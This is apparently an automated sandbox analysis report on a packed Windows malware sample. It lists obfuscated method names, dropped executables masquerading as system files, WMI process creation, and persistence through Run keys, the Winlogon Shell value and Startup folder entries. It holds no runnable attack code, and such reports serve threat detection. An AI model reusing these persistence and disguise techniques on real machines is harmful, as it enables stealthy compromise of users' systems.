Source: 0.0.Vjy8d2EoqK.exe.b2d3b7.2.raw.unpack, JrCZwsIvjVF3h1G2N1o.cs	High entropy of concatenated method names: 'JRlhlQEfZtL0kfq3ks4', 'VxRbgqEofIJuGUj3EeA', 'Ch1UogEn5lY4JBQIpsU', 'DXvgdtEMtmWMlBH5QWl', 'aX33DLiReU', 'YGScCNElar0CxxrSIKM', 'CrQyq2EwURx5BSylilt', 'iuwtpcEZSXeHXZsVXxo', 'C8nKyEELVGrViEgLSxv', 'u2Ydn7ERQoHkkHS0gpM'
Source: 0.0.Vjy8d2EoqK.exe.b2d3b7.2.raw.unpack, aPhSNltzEfrayTqNYZY.cs	High entropy of concatenated method names: 'chsHdZcl5k', 'ACSHgmqbKa', 'rYOH5uVaAn', 'kwfmudn6g7RdIJhktPi', 'gdto1Inu2DEw6rJwHwp', 'AgLTYLncHOkDdLrf9wD', 'hJbjAwnpN5831FXdfLT', 'uFfdWhnV332GvWmrcFk', 'rO7ekMnjUy9EByWjTEY', 'qg6RTPnEeyAc98e0JeG'
Source: 0.0.Vjy8d2EoqK.exe.b2d3b7.2.raw.unpack, apRwVaJ4qyLGtWjkUB.cs	High entropy of concatenated method names: 'x9SWLjbsr', 'i3mQlQr3g', 'NBHRKUg66', 'bemBHuybA9unQyr5IAj', 'VTwnUVyxb0uTCJsxREp', 'Pg1dWhyCY4Wee4lDwe8', 'RyWuZ7ycn2TPxbY532W', 'v4lnJmypR2YLKcaTW86', 'fdQ9dby6TcWlqERGPXr', 'TQoy0SyuCnYfN6XdsQc'
Source: 0.0.Vjy8d2EoqK.exe.b2d3b7.2.raw.unpack, Xbb72oMSLQSvliDvtdr.cs	High entropy of concatenated method names: 'p23', 'YZ8', 'Gog', 'G9C', 'jgJCBjq1yoRiEOA5JX7', 'PX0kVVqmKB5o4iik8Bq', 'SQJ6lDq54o94TRmogdi', 'AMvD5GqiRb0gLU7bFad', 'QOIMAWqT37kFhf9OJ6x', 'CHaMb1qNaZyCZtnkUrc'
Source: 0.0.Vjy8d2EoqK.exe.b2d3b7.2.raw.unpack, OHeT0RYc1rGnJTeSPch.cs	High entropy of concatenated method names: 'semISnwYBi', 'zVHM62ki3DH37I64dwx', 'hh46lqkmbk4q7sc6cy8', 'pHxT81k5p3OIqewOYJ9', 'z31oKNkTrc2MF2ETFRM', 'w3ZvDHkNwhPEvqfSS0U', 'xKfI9RMq7l', 'sxwIkAbMdo', 'tkFIryuIva', 'q7IILPZFiw'
Source: 0.0.Vjy8d2EoqK.exe.b2d3b7.2.raw.unpack, KA6iwBYgdQRABkH6nuj.cs	High entropy of concatenated method names: 'Ep1iNAtaxB', 'TWuicEQOrh', 'eZFizvZebm', 'O4t7KpAtIe', 'Lbu7MFvAIj', 'gIi7YkJj06', 'Oue7tnMHbs', 'vBA7iM0Tc9', 'h1l77n96fS', 'yB6LEI8YGjpFfM2eHbM'
Source: 0.0.Vjy8d2EoqK.exe.b2d3b7.2.raw.unpack, ixCHqCiGdlf6DeJkUri.cs	High entropy of concatenated method names: 'VMVDNrOLqf', 'UsuDWo1mkK', 'PqhDQA7OZV', 'x73DR56Z8M', 'JxsDlXvPlr', 'OsMDwRJHNp', 'f4wD89e105', 'e5TD6PLiuV', 'h6NDVuCD4X', 's3WD0YMaNA'
Source: 0.0.Vjy8d2EoqK.exe.b2d3b7.2.raw.unpack, q5NYheMTUbFVpxGMSKh.cs	High entropy of concatenated method names: 'kNf', 'YZ8', 'U31', 'G9C', 'Fxo4dAq0Adw8yofQZLP', 'wEnuTKqxKh0GPkkM0w7', 'bu5oYBqCnnDvGxbpb2e', 'grEdrwqbZdPblrqhfjy', 'fZxZUiqc9F3VQLG1oNL', 'D3CgmkqpG4qRS416Ubd'
Source: 0.0.Vjy8d2EoqK.exe.b2d3b7.2.raw.unpack, jujMeQihvXTOctv6lrD.cs	High entropy of concatenated method names: 'qRivnHpqGH', 'DmrvWLchQt', 'jZIvQitNQK', 'HcCvRxy93B', 'tFuvl7jgPZ', 'toBengoAKL24MhG5VP4', 'uVc4KGoSCosQ67leYxW', 'FNJVX9ok3ZJG3ysGtdh', 'WlGKhnoWigoV5LctHXf', 'J6oA2LoXIVTcTaF28dX'
Source: 0.0.Vjy8d2EoqK.exe.b2d3b7.2.raw.unpack, ubVmFgIR5O6IktitNm.cs	High entropy of concatenated method names: 'MmFvgR5O6', 'i0F86kLKOPVBUNIIeU', 'KjoWBkwOWDAD3R9UcR', 'YlOmseZX47eELRPSmn', 'f4hV1dRy1SKRH7O3i1', 'ecyHwu0B8xJNgvuJLJ', 'Y9eY8xT1I', 'p6atmkswM', 'SsVigxMd9', 'zpv7P1rtR'
Source: 0.0.Vjy8d2EoqK.exe.b2d3b7.2.raw.unpack, Up9XJDYCHy8FYkARRnc.cs	High entropy of concatenated method names: 'Fk6taMZvLV', 'tDbtnumkRv', 'Yu7tWTcroy', 'X3itQ2RBiW', 'dFItRBEXXm', 'SGFtljBFH5', 'rGstwU7trc', 'vuiqMDKnTNxoNnNU6bL', 'vVMEFoKts2gyHDNebIn', 'UYOeMDKvMZ8LesP0UqO'
Source: 0.0.Vjy8d2EoqK.exe.b2d3b7.2.raw.unpack, tfbb08OntcbpgMoW42X.cs	High entropy of concatenated method names: 'KAB76SVdnJV06FGD89X', 'k7iTtUVQyyie969f6x3', 'xt1ZCvVeanWvt7Z6g49', 'pBmqRrVIGTUK34vgAs6', 'FmGhWvjRtD', 'WM4', '_499', 'OAphQcJb14', 'pvBhRrkpi9', 'FCyhl1f8oB'
Source: 0.0.Vjy8d2EoqK.exe.b2d3b7.2.raw.unpack, lyPmma7EmUsrDZdGQja.cs	High entropy of concatenated method names: 'Wl6Si9b6d4', 'MCSS7XBGLM', 'yf7SOPTREI', 'OIgSIlcV6a', 'ukFSURaygh', 'IfMSC0uNLu', 'VsfSHZLRDd', 'aGNSp5RitA', 'rxmSjaZesO', 'wZeS4bY3M3'
Source: 0.0.Vjy8d2EoqK.exe.b2d3b7.2.raw.unpack, pBItIYtbvG59DjCaF5C.cs	High entropy of concatenated method names: 'oYo', '_1Z5', 'tvsBS5U92f', 'PT8Hi8xNbR', 'uuWB7vIWkO', 'Rna9EyvKjjT9dgLrLXA', 'kbkYuPvDsWU04d3T2VX', 'ymy7cHvUKo32lt7NFXm', 'o79vdNv8qlLEG3DTDaf', 'Rd5Z2HvJe19Slm3Sf1S'
Source: 0.0.Vjy8d2EoqK.exe.b2d3b7.2.raw.unpack, rsEoR5IpaXfYd7V1ncf.cs	High entropy of concatenated method names: 'sgxI4frrJ7MEM', 'VjtyP5EU1vYd2apoGXP', 'ENJjrJE8YyD0vR8OdBS', 'xf4Hw3EJhfQLDKhDOso', 'IuNmiaESSYRaWLdD0un', 'z6ui5EEk087YUEWHg79', 'G8R1IkEKt0dMj0KpglI', 'XkD9s7EDpTxbN2eGqtS', 'cVQoBFEAbV1uJsGVN6d', 'ripabKEWY2fcOsUc8xk'
Source: 0.0.Vjy8d2EoqK.exe.b2d3b7.2.raw.unpack, KY69gF7tTVVo0lQ0jib.cs	High entropy of concatenated method names: 'k4XRRPLtg2SWCZ9jkvn', 'WLUpWZLvIuWitiX6bFW', 'jXoADXLXWC45pvyHhOu', 'una680LgOcxlxBxKVxg', 'l1xrqlxGpR', 'NeXBS5Lf4aLReG7JQjX', 'Jo8kjsLoUZyUFLoDIIT', 'RKJVEqLnAi88iOUsMoY', 'W00AwvLM9QqgEWqBFQ4', 'LtP6QdL76OrpPhos0tK'
Source: 0.0.Vjy8d2EoqK.exe.b2d3b7.2.raw.unpack, ubS7EcQT2nr842VYHD.cs	High entropy of concatenated method names: '_3OK', 'YZ8', '_321', 'G9C', 'ydsqMPePd8cc9nN7GDK', 'ag43waeahRNv1TxCfkH', 'rTd886ezEsb7rWUjPWd', 'Gb0JgKIrwKT1krvqHHg', 'hQmMHPIy2yMUTAbUAoR', 'S2MaTdIecBJeTE6XKdC'
Source: 0.0.Vjy8d2EoqK.exe.b2d3b7.2.raw.unpack, R7TcroM6yN3i2RBiWtF.cs	High entropy of concatenated method names: 'jqJYMGkLIk', 'KDYYYOnV0T', 'YeAYtM7THK', 'FduN8ROTvTmkSigjQAp', 'CIc6lqONqr09oWxBTni', 'LJXCiMO52ay2QBJ2QlH', 'VmjGYdOinPFvolpM77g', 'gQaqRIO35ag46owskBa', 'C04rxxOYjjxGwPpqMU5', 'SiSHFHO2vgTS9rZt3fZ'
Source: 0.0.Vjy8d2EoqK.exe.b2d3b7.2.raw.unpack, jdJ2xFiqY3A1Z2a7rrs.cs	High entropy of concatenated method names: '_45b', 'ne2', '_115', '_3vY', 'tfbvKb08tc', '_3il', 'PpgvMMoW42', 'PG3vY7P7mM', '_78N', 'z3K'

Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1

Persistence and Installation Behavior

Creates processes via WMI

Source: C:\Brokercrt\comReviewsession.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Brokercrt\comReviewsession.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Brokercrt\comReviewsession.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Brokercrt\comReviewsession.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Brokercrt\comReviewsession.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Brokercrt\comReviewsession.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Brokercrt\comReviewsession.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Brokercrt\comReviewsession.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Brokercrt\comReviewsession.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Brokercrt\comReviewsession.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Brokercrt\comReviewsession.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Brokercrt\comReviewsession.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Brokercrt\comReviewsession.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Brokercrt\comReviewsession.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Brokercrt\comReviewsession.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Brokercrt\comReviewsession.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Brokercrt\comReviewsession.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Brokercrt\comReviewsession.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Brokercrt\comReviewsession.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Brokercrt\comReviewsession.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Brokercrt\comReviewsession.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Brokercrt\comReviewsession.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Brokercrt\comReviewsession.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Brokercrt\comReviewsession.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Brokercrt\comReviewsession.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Brokercrt\comReviewsession.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Brokercrt\comReviewsession.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create

Drops PE files with benign system names

Source: C:\Brokercrt\comReviewsession.exe

File created: C:\Program Files\Windows Security\BrowserCore\en-US\dwm.exe

Jump to dropped file

Drops executables to the windows directory (C:\Windows) and starts them

Source: unknown

Executable created and started: C:\Windows\SysWOW64\it-IT\dasHost.exe

Uses cmd line tools excessively to alter registry or file data

Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe

Source: C:\Brokercrt\comReviewsession.exe	File created: C:\Brokercrt\iKSiRODBDWoPAMSDKBDQBFN.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Built.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI64962\_bz2.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Built.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI64962\_ctypes.pyd	Jump to dropped file
Source: C:\Brokercrt\comReviewsession.exe	File created: C:\Program Files (x86)\jDownloader\iKSiRODBDWoPAMSDKBDQBFN.exe	Jump to dropped file
Source: C:\Brokercrt\comReviewsession.exe	File created: C:\Windows\SysWOW64\it-IT\dasHost.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Built.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI64962\unicodedata.pyd	Jump to dropped file
Source: C:\Brokercrt\comReviewsession.exe	File created: C:\Program Files\7-Zip\Lang\iKSiRODBDWoPAMSDKBDQBFN.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Built.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI64962\python311.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\S l r .exe	File created: C:\Users\user\AppData\Local\Temp\XClient.exe	Jump to dropped file
Source: C:\Brokercrt\comReviewsession.exe	File created: C:\Windows\addins\cmd.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Built.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI64962\_sqlite3.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\Vjy8d2EoqK.exe	File created: C:\Users\user\AppData\Local\Temp\svchosts.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Built.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI64962\_queue.pyd	Jump to dropped file
Source: C:\Brokercrt\comReviewsession.exe	File created: C:\Program Files\Windows Security\BrowserCore\en-US\dwm.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	File created: C:\Users\user\AppData\Roaming\XClient.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Built.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI64962\libcrypto-1_1.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Built.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI64962\libffi-8.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Vjy8d2EoqK.exe	File created: C:\Users\user\AppData\Local\Temp\S l r .exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Built.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI64962\_lzma.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Built.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI64962\libssl-1_1.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Built.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI64962\_decimal.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\Vjy8d2EoqK.exe	File created: C:\Users\user\AppData\Local\Temp\Built.exe	Jump to dropped file
Source: C:\Brokercrt\comReviewsession.exe	File created: C:\Recovery\powershell.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\S l r .exe	File created: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Built.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI64962\VCRUNTIME140.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Built.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI64962\select.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Built.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI64962\_ssl.pyd	Jump to dropped file
Source: C:\Brokercrt\comReviewsession.exe	File created: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Templates\iKSiRODBDWoPAMSDKBDQBFN.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Built.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI64962\rar.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Built.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI64962\sqlite3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Built.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI64962\_socket.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\svchosts.exe	File created: C:\Brokercrt\comReviewsession.exe	Jump to dropped file
Source: C:\Brokercrt\comReviewsession.exe	File created: C:\Windows\apppatch\en-US\conhost.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Built.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI64962\_hashlib.pyd	Jump to dropped file

Source: C:\Brokercrt\comReviewsession.exe	File created: C:\Windows\SysWOW64\it-IT\dasHost.exe	Jump to dropped file
Source: C:\Brokercrt\comReviewsession.exe	File created: C:\Windows\addins\cmd.exe	Jump to dropped file
Source: C:\Brokercrt\comReviewsession.exe	File created: C:\Windows\apppatch\en-US\conhost.exe	Jump to dropped file

Boot Survival

Creates an autostart registry key pointing to binary in C:\Windows

Source: C:\Brokercrt\comReviewsession.exe

Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run dasHost

Creates an undocumented autostart registry key

Source: C:\Brokercrt\comReviewsession.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell
Source: C:\Brokercrt\comReviewsession.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell
Source: C:\Brokercrt\comReviewsession.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell
Source: C:\Brokercrt\comReviewsession.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell
Source: C:\Brokercrt\comReviewsession.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell
Source: C:\Brokercrt\comReviewsession.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell
Source: C:\Brokercrt\comReviewsession.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell
Source: C:\Brokercrt\comReviewsession.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell
Source: C:\Brokercrt\comReviewsession.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell

Creates autostart registry keys with suspicious values (likely registry only malware)

Source: C:\Brokercrt\comReviewsession.exe

Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run powershell "C:\Recovery\powershell.exe"

Creates multiple autostart registry keys

Source: C:\Brokercrt\comReviewsession.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run iKSiRODBDWoPAMSDKBDQBFN
Source: C:\Brokercrt\comReviewsession.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run dasHost
Source: C:\Brokercrt\comReviewsession.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run powershell
Source: C:\Brokercrt\comReviewsession.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run dwm
Source: C:\Brokercrt\comReviewsession.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run cmd
Source: C:\Brokercrt\comReviewsession.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run conhost
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run XClient

Source: C:\Users\user\AppData\Local\Temp\Built.exe

File created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ? .scr

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\Built.exe	File created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ? .scr			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XClient.lnk

Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run XClient
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run XClient
Source: C:\Brokercrt\comReviewsession.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run dasHost
Source: C:\Brokercrt\comReviewsession.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run dasHost
Source: C:\Brokercrt\comReviewsession.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run iKSiRODBDWoPAMSDKBDQBFN
Source: C:\Brokercrt\comReviewsession.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run iKSiRODBDWoPAMSDKBDQBFN
Source: C:\Brokercrt\comReviewsession.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run iKSiRODBDWoPAMSDKBDQBFN
Source: C:\Brokercrt\comReviewsession.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run iKSiRODBDWoPAMSDKBDQBFN
Source: C:\Brokercrt\comReviewsession.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run dwm
Source: C:\Brokercrt\comReviewsession.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run dwm
Source: C:\Brokercrt\comReviewsession.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run dwm
Source: C:\Brokercrt\comReviewsession.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run dwm
Source: C:\Brokercrt\comReviewsession.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run powershell
Source: C:\Brokercrt\comReviewsession.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run powershell
Source: C:\Brokercrt\comReviewsession.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run cmd
Source: C:\Brokercrt\comReviewsession.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run cmd
Source: C:\Brokercrt\comReviewsession.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run conhost
Source: C:\Brokercrt\comReviewsession.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run conhost
Source: C:\Brokercrt\comReviewsession.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run iKSiRODBDWoPAMSDKBDQBFN
Source: C:\Brokercrt\comReviewsession.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run iKSiRODBDWoPAMSDKBDQBFN
Source: C:\Brokercrt\comReviewsession.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run iKSiRODBDWoPAMSDKBDQBFN
Source: C:\Brokercrt\comReviewsession.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run iKSiRODBDWoPAMSDKBDQBFN
Source: C:\Brokercrt\comReviewsession.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run iKSiRODBDWoPAMSDKBDQBFN
Source: C:\Brokercrt\comReviewsession.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run iKSiRODBDWoPAMSDKBDQBFN
Source: C:\Brokercrt\comReviewsession.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run iKSiRODBDWoPAMSDKBDQBFN
Source: C:\Brokercrt\comReviewsession.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run iKSiRODBDWoPAMSDKBDQBFN

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
